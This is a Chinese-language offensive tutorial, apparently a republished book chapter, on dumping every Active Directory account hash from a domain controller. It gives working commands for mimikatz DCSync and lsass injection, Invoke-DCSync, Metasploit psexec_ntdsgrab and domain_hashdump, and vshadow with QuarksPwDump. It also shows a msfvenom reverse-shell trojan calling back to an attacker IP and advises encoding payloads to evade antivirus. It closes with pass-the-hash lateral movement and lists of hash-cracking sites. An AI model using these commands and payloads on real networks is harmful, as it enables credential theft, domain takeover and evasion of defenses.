攻击域控丝滑小连招(2)

2023-11-15 17:24:16 浏览数 (2)

利用Dcsync获取域用户Hash

Mimikatz转储域Hash

Mimikatz有一个名为dcsync的功能,它利用目录复制服务直接读取ntds.dit文件检索域哈希值,但是必须使用域管理员权限运行mimikatz才可以读取ntds.dit。

在域域内任意一台计算机以域管理员权限打开cmd,运行mimikatz,输入如下命令,mimikatz成功导出域内用户名及Hash,如图6-34所示。

代码语言:javascript复制
lsadump::dcsync /domain:pentest.com /all /csv

图6-34使用Dcsync获取域内所有用户和Hash

Tips:

1、mimikatz的dcsync功能也可以导出指定某个用户的Hash,命令如下:

代码语言:javascript复制
lsadump::dcsync /domain:pentest.com /user:Dm

这样就可以直接导出域用户Dm的hash。

2、mimikatz也可以直接在域控制器上运行,通过转储lsass.exe进程dump Hash。

先提升权限,再进行注入,如图6-35所示,依次输入命令:

代码语言:javascript复制
privilege::debug
lsadump::lsa /inject

图6-35使用mimikatz转储lsass.exe进程获取Hash

域内所有账号和域Hash被成功导出,如果不先执行privilege::debug命令,会导致权限不足,读取失败。如果用户太多mimikatz不能完全显示,可以先执行log命令,log命令会在mimikatz目录生成一个txt,记录所有mimikatz的执行结果,方便阅览。

Powershell脚本DCsync获取域账号及域Hash

Invoke-DCSync.ps1是利用dcsync直接读取ntds.dit获取域账号及域Hash,下载地址如下:

代码语言:javascript复制
https://gist.github.com/monoxgas/9d238accd969550136db

首先,导入模块,输入命令, Invoke-DCSync -PWDumpFormat这里我们使用PWDumpFormat参数,格式化输出,方便查看,如图6-36所示:

图6-36使用Powershell通过Dcsync获取全部Hash

metasploit获取域Hash

metasploit获取域Hash

该小节包括两种方法,第一种方法是使用psexec辅助获取域控制器的ntds.dit进而获得域账号和域Hash,第二种方法是使用现有Meterpreter进行后渗透,在已有域控制器Meterpreter会话的前提下完成的。

1.psexec_ntdsgrab模块使用

首先在Kali下进入msf,使用该模块,输入命令

代码语言:javascript复制
use auxiliary/admin/smb/psexec_ntdsgrab

查看需要配置的参数,输入命令show options,需要配置的有RHOST、SMBDomain、SMBUser、SMBPass,如图6-37所示:

图6-37配置metasploit获取全部Hash

配置完毕后输入exploit执行,该脚本使用Volume Shadow Copy然后将ntds.dit和SYSTEM复制传回kali机器,位置为/root/.msf4/loot/文件夹中,如图6-38所示。

图6-38运行脚本

接下来使用impacket工具包等相关工具配合使用,解析ntds.dit,导出域账号和域Hash信息。

2. 基于Meterpreter会话获取域账号和域Hash

这里没有域控制器的Meterpreter会话,首先获得一个Meterpreter会话,打开msf,依次输入如下命令。

代码语言:javascript复制
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0  
set lport 5555    

查看配置,show options,已经配置完毕,如图6-39所示。

图6-39设置监听器

在Kali中集成了msfvenom,msfvenom可以生成多种类型的Payload,它是Msfpayload和Msfencode的组合,msfvenom替换了msfpayload和msfencode,后两者已经不在使用。

首先生成一个exe到木马程序,输入命令:

代码语言:javascript复制
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.220 LPORT=5555 -f exe > s.exe

此命令会在root目录下生成一个s.exe,执行后它会将一个Meterpreter会话反弹到192.168.100.220,端口为5555,本书中为方便演示直接生成的exe文件,在实战环境下可以使用msfvenom生成时进行编码,绕过防病毒软件,或使用其他格式的Payload,方便修改绕过防病毒软件,如生成Powershell,Vbs等格式Payload。可以看到s.exe生成成功,如图6-40所示。

图6-40配置并生成msf使用的木马

将它上传到目标系统,然后在之前打开的msfconsole界面,执行命令exploit -j -z,在目标系统执行文件,msf提示我们成功获取到一个Meterpreter会话,如图6-41所示。

图6-41启动监听器

在msf下输入sessions可以查看当前存在的Meterpreter会话,可以看到现在有一个id为1的Meterpreter会话,ip为192.168.100.220,机器名为DC,正是我们的域控制器。

接下来我们使用domain_hashdump模块获取域账号和域Hash信息。在msf中输入命令

代码语言:javascript复制
use windows/gather/credentials/domain_hashdump

之前的Meterpreter会话id为1,所以我们输入set session 1,然后输入exploit执行,如图6-42所示。

图6-42配合meterpreter导出全部域Hash

执行完毕后可以看到,ntds.dit被成功解析,域账号和域Hash导出成功,如图6-43所示。

图6-43域内全部Hash被全部导出

vshadow.exe QuarksPwDump.exe快速导出域账号及域Hash

正常的域网络环境中ntds.dit存放大量信息,将ntds.dit导出后也体积过大,不方便从被渗透机器拖回本地,如果在拿下域控制器时,域控制器没有杀毒软件,我们可以使用这种组合直接在域控制器上进入导出ntds.dit然后解析ntds.dit导出域账号及域Hash,不需要将ntds.dit拷贝回本地,被导出的域账号及域Hash只是文本文件,体积较小,方便拖回处理。另外quarkspwdump的源码也在github中,可以自行进行免杀,快速、安全、全面的读取全部域账号及域Hash。quarkspwdump下载地址:

代码语言:javascript复制
https://github.com/quarkslab/quarkspwdump

ShadowCopy 是一款增强型的免费文件复制工具,由于使用了微软卷影副本(Volume Shadow Copy)技术,它能够复制被锁定的文件或者被其他程序打开的文件。

vshadow.exe是从微软SDK中提取出来的,SDK可以在微软官方进行下载,安装完成后VSSSDK72TestAppsvshadow目录中有bin文件vshadow.exe,可以单独提取使用,vshadow.exe等相关工具后续会打包提供下载。我们将文件全部放入domainhash文件夹中,如图6-44所示。

图6-44实验所需工具

在shadowcopy.bat中设置工作目录为C:WindowsTemp具体目录可以在shadowcopy.bat中自行设置,直接执行shadowcopy.bat脚本,该脚本先使用vshadow.exe进行快照,然后复制出ntds.dit,使用quarkspwdump修复ntds.dit后导出域Hash,脚本运行完毕后,会在本目录存放导出的ntds.dit和一个txt文本文件,里面存放了域内所有域账号及域Hash,如图6-45所示。

图6-45被导出的ntds.dit和hash.txt

我们可以看到域内所有账号及域Hash被成功导出,我们只用将hash.txt下载回本地就可以,如图6-46所示。

图6-46域内所有用户的hash

总结

我们在上述列举了多种方法导出用户Hash,得到Hash后,可以进行PTH(Pass The Hash),又名哈希传递攻击,我们可以将抓取到的Hash通过psexec、wmi、mimikatz等方法或工具传递到内网中其他机器,扩大战果。我们也可以使用本地工具或者在线工具进行破解Hash,如果在本地破解,可以使用Cain、LC7、ophcrack、SAMinside、hashcat等工具进行暴力破解,可以在

代码语言:javascript复制
http://ophcrack.sourceforge.net/tables.php

中下载彩虹表进行辅助破解,本地暴力破解速度取决于机器性能,现在大多数破解工具都支持GPU破解,加快了破解速度。

在线NTLM的hash值破解。

http://www.cmd5.com/

https://www.somd5.com/

https://hashkiller.co.uk/ntlm-decrypter.aspx

http://finder.insidepro.com/

https://crackstation.net/

http://www.objectif-securite.ch/ophcrack.php

在线LM的hash值破解。

http://www.objectif-securite.ch/ophcrack.php

http://cracker.offensive-security.com/index.php

0 人点赞